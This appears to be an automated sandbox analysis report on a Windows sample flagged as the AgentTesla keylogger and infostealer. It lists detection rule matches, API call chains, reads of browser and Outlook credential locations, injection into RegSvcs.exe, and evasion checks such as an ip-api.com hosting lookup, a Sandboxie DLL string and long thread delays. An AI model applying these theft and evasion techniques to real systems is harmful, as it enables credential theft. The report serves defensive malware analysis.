                Source: 0.2.4287eV6mBc.exe.b10000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                Source: 0.2.4287eV6mBc.exe.b10000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                Source: 0.2.4287eV6mBc.exe.b10000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                Source: 0.2.4287eV6mBc.exe.b10000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                Source: 00000000.00000002.1383949658.0000000000B10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                Source: 00000000.00000002.1383949658.0000000000B10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/2@2/2
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_0064A06A GetLastError,FormatMessageW,0_2_0064A06A
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_006381CB AdjustTokenPrivileges,CloseHandle,0_2_006381CB
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_006387E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_006387E1
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_0064B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0064B333
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_0065EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0065EE0D
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_006583BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_006583BB
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_005E4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_005E4E89
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                Source: C:\Users\user\Desktop\4287eV6mBc.exeFile created: C:\Users\user\AppData\Local\Temp\aut5642.tmpJump to behavior
                Source: 4287eV6mBc.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\4287eV6mBc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: 4287eV6mBc.exeReversingLabs: Detection: 79%
                Source: 4287eV6mBc.exeVirustotal: Detection: 61%
                Source: unknownProcess created: C:\Users\user\Desktop\4287eV6mBc.exe "C:\Users\user\Desktop\4287eV6mBc.exe"
                Source: C:\Users\user\Desktop\4287eV6mBc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\4287eV6mBc.exe"
                Source: C:\Users\user\Desktop\4287eV6mBc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\4287eV6mBc.exe"Jump to behavior
                Source: C:\Users\user\Desktop\4287eV6mBc.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\4287eV6mBc.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\4287eV6mBc.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\4287eV6mBc.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\4287eV6mBc.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\4287eV6mBc.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\4287eV6mBc.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\4287eV6mBc.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\4287eV6mBc.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\4287eV6mBc.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\4287eV6mBc.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                Source: 4287eV6mBc.exeStatic file information: File size 1072128 > 1048576
                Source: 4287eV6mBc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: 4287eV6mBc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: 4287eV6mBc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: 4287eV6mBc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: 4287eV6mBc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: 4287eV6mBc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: 4287eV6mBc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: wntdll.pdbUGP source: 4287eV6mBc.exe, 00000000.00000003.1380738298.0000000003470000.00000004.00001000.00020000.00000000.sdmp, 4287eV6mBc.exe, 00000000.00000003.1382245701.0000000003610000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: 4287eV6mBc.exe, 00000000.00000003.1380738298.0000000003470000.00000004.00001000.00020000.00000000.sdmp, 4287eV6mBc.exe, 00000000.00000003.1382245701.0000000003610000.00000004.00001000.00020000.00000000.sdmp
                Source: 4287eV6mBc.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: 4287eV6mBc.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: 4287eV6mBc.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: 4287eV6mBc.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: 4287eV6mBc.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_005E4B37 LoadLibraryA,GetProcAddress,0_2_005E4B37
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_005EC4C6 push A3005EBAh; retn 005Eh0_2_005EC50D
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_00608945 push ecx; ret 0_2_00608958
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_063F5BE0 push es; ret 2_2_063F5BF0
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_005E48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_005E48D7
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_00665376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00665376
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_00603187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00603187
                Source: C:\Users\user\Desktop\4287eV6mBc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\4287eV6mBc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\4287eV6mBc.exeAPI/Special instruction interceptor: Address: E9C624
                Source: RegSvcs.exe, 00000002.00000002.3802883039.0000000002E71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                Source: 4287eV6mBc.exe, 00000000.00000002.1383949658.0000000000B10000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3801126508.0000000000402000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SBIEDLL.DLLESELECT * FROM WIN32_COMPUTERSYSTEM
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599641Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599516Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599405Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599297Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599188Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599063Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598938Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598719Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598594Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598485Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598360Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598235Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597940Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597813Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597688Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597563Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597438Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597328Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597219Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597109Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596891Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596672Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596562Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596344Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596235Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595860Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595735Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595610Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595485Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595360Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595235Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594860Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594735Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594610Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594485Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594360Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594235Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7171Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2650Jump to behavior
                Source: C:\Users\user\Desktop\4287eV6mBc.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-102381
                Source: C:\Users\user\Desktop\4287eV6mBc.exeAPI coverage: 4.9 %
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_0064445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0064445A
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_0064C6D1 FindFirstFileW,FindClose,0_2_0064C6D1
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_0064C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0064C75C
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_0064EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0064EF95
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_0064F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0064F0F2
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_0064F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0064F3F3
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_006437EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_006437EF
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_00643B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00643B12
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_0064BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0064BCBC
                Source: C:\Users\user\Desktop\4287eV6mBc.exeCode function: 0_2_005E49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_005E49A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599641Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599516Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599405Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599297Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599188Jump to behavior
